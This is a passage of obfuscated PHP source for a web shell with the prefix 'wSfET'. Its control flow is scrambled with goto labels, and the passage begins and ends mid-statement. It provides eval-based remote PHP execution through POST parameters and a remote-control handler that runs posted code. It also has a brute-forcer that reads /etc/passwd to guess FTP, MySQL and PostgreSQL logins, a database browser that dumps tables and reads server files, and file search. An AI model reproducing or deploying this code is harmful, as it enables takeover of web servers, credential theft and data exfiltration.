strtoupper($r); goto F6aca; C4acc: $r = ''; goto Cac2d; Cac2d: $i = 0; goto d82a2; F6aca: } } goto A94be; A14dd: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto d2243; ddf09: B5888: goto B4944; B4944: return $r; goto b869e; db3e2: $i = 0; goto d5e3b; c293d: A1c72: goto fbf56; d2243: $r = ''; goto db3e2; fbf56: $i += 2; goto e2777; e2777: goto Ce4f0; goto ddf09; d5e3b: Ce4f0: goto E66ac; D43ec: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto c293d; E66ac: if (!($i < strLen($p))) { goto B5888; } goto D43ec; b869e: } } goto E87ee; c9ffe: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto d2e6b; df97d: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto A14dd; aff89: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; d39c2: } goto C548a; adb9c: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto df97d; f940a: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto a40cc; dac61: echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>"; goto F2e50; C548a: C6d14: goto c9ffe; F36c5: echo '<h1>String conversions</h1><div class=content>'; goto B51ad; A5efe: if (isset($_POST['ajax'])) { goto B5a90; Ce1b9: ob_start(); goto B88b8; B88b8: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto Bb0d7; Bb161: exit; goto a79c8; d6ab6: echo strlen($temp), "\n", $temp; goto Bb161; B5a90: wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Ce1b9; Bb0d7: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto d6ab6; a79c8: } goto f940a; a40cc: wSfETHeader(); goto F36c5; e2a99: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto A5efe; d2e6b: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto a9f6a; B51ad: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto aff89; Ba96f: function wSfETRecursiveGlob($path) { goto C59ae; E8a58: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto A33da; C59ae: if (substr($path, -1) != '/') { $path .= '/'; } goto E8a58; A33da: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wSfETRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } A4eb3: } Cfde1: } goto a4a29; a4a29: } goto d388b; a9f6a: echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>"; goto Ba96f; d388b: if (@$_POST['p3']) { wSfETRecursiveGlob($_POST['c']); } goto dac61; A94be: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto A35cb; A35cb: $r = ''; goto b0399; C21b9: ++$i; goto fee9c; ef197: Bb7bd: goto Ed4f5; b0399: $i = 0; goto dbaf7; fee9c: goto e8078; goto ef197; dbaf7: e8078: goto d7b11; Ed4f5: return strtoupper($r); goto F137a; d7b11: if (!($i < strlen($p))) { goto Bb7bd; } goto c83ed; c83ed: $r .= '%' . dechex(ord($p[$i])); goto e6aa4; e6aa4: ef5ed: goto C21b9; F137a: } } goto e2a99; F2e50: wSfETFooter(); goto c849c; c849c: } goto ca12a; E00a5: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto A9872; ac6a5: error_reporting(0); goto bfe7c; fee0b: function actionPhp() { goto b267b; C304c: if (!empty($_POST['p1'])) { goto ce9f8; A2bce: eval($_POST['p1']); goto ef804; ce9f8: ob_start(); goto A2bce; ef804: echo htmlspecialchars(ob_get_clean()); goto Af276; Af276: } goto f3606; dbd90: wSfETHeader(); goto db132; a4cd2: wSfETFooter(); goto Fe425; db132: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto Da4b6; C88c3: phpinfo(); goto Ecd16; bf232: $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto Fe1a3; Da4b6: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto c997c; Fe1a3: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto D9900; c997c: ob_start(); goto C88c3; Ecd16: $tmp = ob_get_clean(); goto bf232; D9900: } goto eef99; eef99: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto ff904; b267b: if (isset($_POST['ajax'])) { goto Ff910; B102f: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto Adc1e; Ed210: ob_start(); goto b1827; Adc1e: echo strlen($temp), "\n", $temp; goto F12b3; b1827: eval($_POST['p1']); goto B102f; Ff910: wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Ed210; F12b3: exit; goto Db88a; Db88a: } goto E8ec1; ff904: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto C304c; f3606: echo '</pre></div>'; goto a4cd2; E8ec1: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { wSfETsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto dbd90; Fe425: } goto F3ad7; E9b4b: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wSfET_version" => wSfET_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto b33c0; f7cfb: function actionBruteforce() { goto D9d81; fd5f3: if (isset($_POST['proto'])) { goto Ff7be; f7c94: $attempts = 0; goto F04fe; A0365: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto Daaa4; Daaa4: $line = explode(":", $line); goto Adedf; ba89c: if (@$_POST['reverse']) { goto A09dc; Fb383: $tmp .= $line[0][$i]; goto b9852; A09dc: $tmp = ""; goto a9f8b; ce3d8: if (wSfETBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto Eb51f; Cd66c: if (!($i >= 0)) { goto Beb2d; } goto Fb383; f601b: Beb2d: goto b7c2b; b7c2b: ++$attempts; goto ce3d8; a9f8b: $i = strlen($line[0]) - 1; goto fdbfd; b9852: a63f1: goto C2f7e; fdbfd: Fd388: goto Cd66c; A7fbc: goto Fd388; goto f601b; C2f7e: --$i; goto A7fbc; Eb51f: } goto e4234; e4234: Ddfd6: goto Fadfc; C68a7: if (wSfETBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto ba89c; Adedf: ++$attempts; goto C68a7; Fadfc: } d6e08: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto e36f0; e36f0: $line = trim($line); goto fbdd6; fbdd6: ++$attempts; goto Df7ab; Df7ab: if (wSfETBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto a01ea; a01ea: e65bf: goto d4e80; d4e80: } C4077: } } goto c2118; Ff7be: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto Bfe2e; Bfe2e: if ($_POST['proto'] == 'ftp') { function wSfETBruteForce($ip, $port, $login, $pass) { goto Df0f9; fdcfa: @ftp_close($fp); goto Ab521; Df0f9: $fp = @ftp_connect($ip, $port ? $port : 21); goto c36af; Ab521: return $res; goto ed058; c36af: if (!$fp) { return false; } goto ab34c; ab34c: $res = @ftp_login($fp, $login, $pass); goto fdcfa; ed058: } } elseif ($_POST['proto'] == 'mysql') { function wSfETBruteForce($ip, $port, $login, $pass) { goto B53ac; e61ce: return $res; goto C8f73; Cdf84: @mysql_close($res); goto e61ce; B53ac: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto Cdf84; C8f73: } } elseif ($_POST['proto'] == 'pgsql') { function wSfETBruteForce($ip, $port, $login, $pass) { goto eed98; eb524: @pg_close($res); goto e4711; df267: $res = @pg_connect($str); goto eb524; eed98: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto df267; e4711: return $res; goto cda1d; cda1d: } } goto a5ef2; a5ef2: $success = 0; goto f7c94; F04fe: $server = explode(":", $_POST['server']); goto A0365; c2118: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto Db6af; Db6af: } goto c42d7; Abf32: echo '</div><br>'; goto A1f5f; A1f5f: wSfETFooter(); goto e83ca; D9d81: wSfETHeader(); goto fd5f3; c42d7: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto Abf32; e83ca: } goto f1f0d; f1f0d: function actionSql() { goto fa298; E2321: echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' "; goto Aa8e0; F6568: $tmp = "<input type=text name=sql_base value=''>"; goto Ebd39; E3f84: echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>"; goto F4358; B0b57: wSfETFooter(); goto B118d; fa298: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto Dabcf; Dabcf: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto a9fa7; case 'pgsql': goto d3316; F50db: goto a9fa7; goto b6808; d3316: $host = explode(':', $host); goto a3018; a3018: if (!$host[1]) { $host[1] = 5432; } goto b768e; b768e: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto F50db; b6808: } goto B559e; B559e: ddf44: goto B8e87; Fe539: return false; goto Fdc1f; B8e87: a9fa7: goto Fe539; Fdc1f: } function selectdb($db) { goto A3154; F8b32: B1f89: goto fc219; A3154: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto B1f89; } goto E32e9; fc219: return false; goto F9b6f; E32e9: aaf93: goto F8b32; F9b6f: } function query($str) { goto b3f7f; F0db6: f6d54: goto ae1c1; ae1c1: return false; goto ac933; b3f7f: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto f6d54; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto f6d54; } goto D59cf; D59cf: c3224: goto F0db6; ac933: } function fetch() { goto D8562; e8e1d: return false; goto B76c0; ab427: ac14a: goto e8e1d; f48f8: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto ac14a; case 'pgsql': return @pg_fetch_assoc($res); goto ac14a; } goto C2603; D8562: $res = func_num_args() ? func_get_arg(0) : $this->res; goto f48f8; C2603: Da8b1: goto ab427; B76c0: } function listDbs() { goto f9db1; b6f62: a1255: goto d8eef; fbd67: F4ec4: goto b6f62; d8eef: return false; goto b5f53; f9db1: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto a1255; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto a1255; } goto fbd67; b5f53: } function listTables() { goto F7067; bc2e9: F5503: goto f03d6; B2455: return false; goto acb6b; F7067: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto B6d0d; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto B6d0d; } goto bc2e9; f03d6: B6d0d: goto B2455; acb6b: } function error() { goto E419b; E419b: switch ($this->type) { case 'mysql': return @mysql_error(); goto Eda07; case 'pgsql': return @pg_last_error(); goto Eda07; } goto C720c; dea98: Eda07: goto b7ba1; C720c: ecffb: goto dea98; b7ba1: return false; goto Cd991; Cd991: } function setCharset($str) { goto B354b; Cad0d: return false; goto ee4d7; B354b: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto Df65b; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto Df65b; } goto Ee572; a82d2: Df65b: goto Cad0d; Ee572: Cb6df: goto a82d2; ee4d7: } function loadFile($str) { goto D442d; ad018: a1fd7: goto E4b58; E4b58: Ca655: goto d4102; d4102: return false; goto aed76; D442d: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto Ca655; case 'pgsql': goto a0879; F2913: $this->query('drop table wSfET2'); goto C4768; F84a3: c6952: goto F2913; f9873: $r = array(); goto cf12b; a0879: $this->query("CREATE TABLE wSfET2(file text);COPY wSfET2 FROM '" . addslashes($str) . "';select file from wSfET2;"); goto f9873; c2e7e: $r[] = $i['file']; goto c53d0; c53d0: goto b95b7; goto F84a3; e1e6a: goto Ca655; goto bfcc1; C4768: return array('file' => implode("\n", $r)); goto e1e6a; cf12b: b95b7: goto bddbd; bddbd: if (!($i = $this->fetch())) { goto c6952; } goto c2e7e; bfcc1: } goto ad018; aed76: } function dump($table, $fp = false) { goto a095b; A18ca: c2474: goto fbbfc; fbbfc: Bfc7b: goto b36b8; a095b: switch ($this->type) { case 'mysql': goto Ed01c; D93d0: if ($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } goto e47e8; Cf6a7: $sql = ''; goto D93d0; fda96: goto Bfc7b; goto De976; C652e: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto D8873; A1f70: goto E2acb; goto B73fd; e47e8: $columns = array(); goto b861a; adae3: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "\n\t,(" . implode(", ", $item) . ')'; } goto C0085; d1919: $i++; goto A1f70; C0085: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto d1919; B9e8b: $head = true; goto F4bce; Ed01c: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto fa683; c0912: $i = 0; goto B9e8b; D8873: $this->query('SELECT * FROM `' . $table . '`'); goto c0912; fa683: $create = mysql_fetch_array($res); goto B61df; b861a: foreach ($item as $k => $v) { goto C4038; Ddbf7: c74a8: goto D76e1; D93ad: $columns[] = "`" . $k . "`"; goto Ddbf7; C4038: if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto D93ad; D76e1: } goto cb60d; bcc0f: if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } goto fda96; B73fd: Be4df: goto bcc0f; d4cee: if (!($item = $this->fetch())) { goto Be4df; } goto Cf6a7; cb60d: f9549: goto adae3; B61df: $sql = $create[1] . ";\n"; goto C652e; F4bce: E2acb: goto d4cee; De976: case 'pgsql': goto Fe464; Cc347: A3b0e: goto Ed293; A1271: if (!($item = $this->fetch())) { goto A3b0e; } goto a3196; a3c10: dc404: goto A1271; a3196: $columns = array(); goto E4b3d; Fe464: $this->query('SELECT * FROM ' . $table); goto a3c10; f84d8: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto Ad3f8; c4870: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n"; goto f84d8; E4b3d: foreach ($item as $k => $v) { goto D5df2; B7f13: $columns[] = $k; goto e24ea; D5df2: $item[$k] = "'" . addslashes($v) . "'"; goto B7f13; e24ea: ceaed: goto d43ad; d43ad: } goto D9852; D9852: B8f2c: goto c4870; Ad3f8: goto dc404; goto Cc347; Ed293: goto Bfc7b; goto A1eef; A1eef: } goto A18ca; b36b8: return false; goto Abe96; Abe96: } } goto Dc6a3; F4358: if (isset($db) && $db->link) { goto e427f; A85ed: echo "</table></form><br/>"; goto Cfacb; F1643: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto d307c; ae6c9: if (!empty($_POST['sql_base'])) { goto E4a0a; Eda21: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto aee1d; F1fc6: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto Dc48f; E850e: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto Aebda; F1aec: $value = htmlspecialchars($value); goto E850e; Acf71: list($key, $value) = each($item); goto d2645; E4a0a: $db->selectdb($_POST['sql_base']); goto ee5c1; ee5c1: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto df9c9; aee1d: if (@$_POST['p1'] == 'select') { goto Aeeaf; Dfa36: echo " of {$pages}"; goto bf882; e5261: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto ed71d; a863c: echo "<br><br>"; goto Aa4d7; A812d: $pages = ceil($num['n'] / 30); goto e8678; bf882: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto e5261; Aeeaf: $_POST['p1'] = 'query'; goto fc271; d15c0: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto a863c; ed71d: $_POST['p3']--; goto d15c0; ad3f8: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto cb1c6; fc271: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto ad3f8; e8678: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto Dfa36; cb1c6: $num = $db->fetch(); goto A812d; Aa4d7: } goto c2e41; d2645: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto F1aec; Dc48f: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto b9a86; df9c9: $tbls_res = $db->listTables(); goto f1a54; f1a54: A6d58: goto ac129; Cfee1: echo "</td></tr>"; goto E8647; ac129: if (!($item = $db->fetch($tbls_res))) { goto Cb62f; } goto Acf71; Aebda: goto A6d58; goto ee16e; ee16e: Cb62f: goto Eda21; b9a86: echo "</textarea><br/><input type=submit value='Execute'>"; goto Cfee1; c2e41: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto Df4d8; f24bf: if (!$title) { goto C2339; f2539: echo '</tr><tr>'; goto e69dd; B6d2f: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; f6caa: } goto Fb38f; b2f3c: $title = true; goto f2539; e69dd: $line = 2; goto D8eba; C2339: echo '<tr>'; goto B6d2f; d7455: reset($item); goto b2f3c; Fb38f: Cdac1: goto d7455; D8eba: } goto d923e; d1b87: if (!($item = $db->fetch())) { goto A1640; } goto f24bf; d923e: echo '<tr class="l' . $line . '">'; goto f4bfe; f4bfe: $line = $line == 1 ? 2 : 1; goto Aeebf; ff343: $line = 1; goto Eb10f; Fd787: goto dbbc3; goto Dc500; Dc500: A1640: goto ebdb7; f2f85: dead0: goto d3674; ebdb7: echo '</table>'; goto ebb33; Eb10f: dbbc3: goto d1b87; Aeebf: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } Ed6b6: } goto f2f85; d3674: echo '</tr>'; goto Fd787; Df4d8: $title = false; goto cccbe; cccbe: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto ff343; ebb33: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto F1fc6; E8647: } goto A85ed; e427f: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto ae6c9; Cfacb: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto F1643; d307c: } else { echo htmlspecialchars($db->error()); } goto c4495; Aa8e0: if (@$_POST['type'] == 'mysql') { echo 'selected'; } goto D6424; Ebd39: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto Faeed; C4bdc: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto dcb37; Aec42: list($key, $value) = each($item); goto C4bdc; dcb37: goto Dc3ce; goto f2ea4; C46e9: B9d42: goto F0d27; Ce2d0: Dc3ce: goto Faa9c; A4173: afabe: goto C46e9; Faa9c: if (!($item = $db->fetch())) { goto Afc9a; } goto Aec42; f2ea4: Afc9a: goto cfced; F7ddb: echo "<select name=sql_base><option value=''></option>"; goto Ce2d0; Faeed: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto B9d42; case "UTF-8": $db->setCharset('utf8'); goto B9d42; case "KOI8-R": $db->setCharset('koi8r'); goto B9d42; case "KOI8-U": $db->setCharset('koi8u'); goto B9d42; case "cp866": $db->setCharset('cp866'); goto B9d42; } goto A4173; F0d27: $db->listDbs(); goto F7ddb; cfced: echo '</select>'; goto Cca1a; Cca1a: } else { echo $tmp; } } else { echo $tmp; } goto E3f84; c4495: echo '</div>'; goto B0b57; D6424: echo ">MySql</option><option value='pgsql' "; goto Ada85; Dc6a3: $db = new DbClass($_POST['type']); goto b48a9; b48a9: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto e2ecd; e3a09: Cfee7: goto a0e4c; Cf346: if (empty($_POST['file'])) { goto e394a; Ccc56: header("Content-Disposition: attachment; filename=dump.sql"); goto b7b44; A5965: exit; goto dacb1; e394a: ob_start("ob_gzhandler", 4096); goto Ccc56; A287d: foreach ($_POST['tbl'] as $v) { $db->dump($v); C0650: } goto ec26b; b7b44: header("Content-Type: text/plain"); goto A287d; ec26b: Bf2cb: goto A5965; dacb1: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto Faf2a; e9772: fclose($fp); goto d16ce; Faf2a: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); a952f: } goto F8b80; d16ce: unset($_POST['p2']); goto F4946; F8b80: a6cf0: goto e9772; F4946: } else { die('<script>alert("Error! 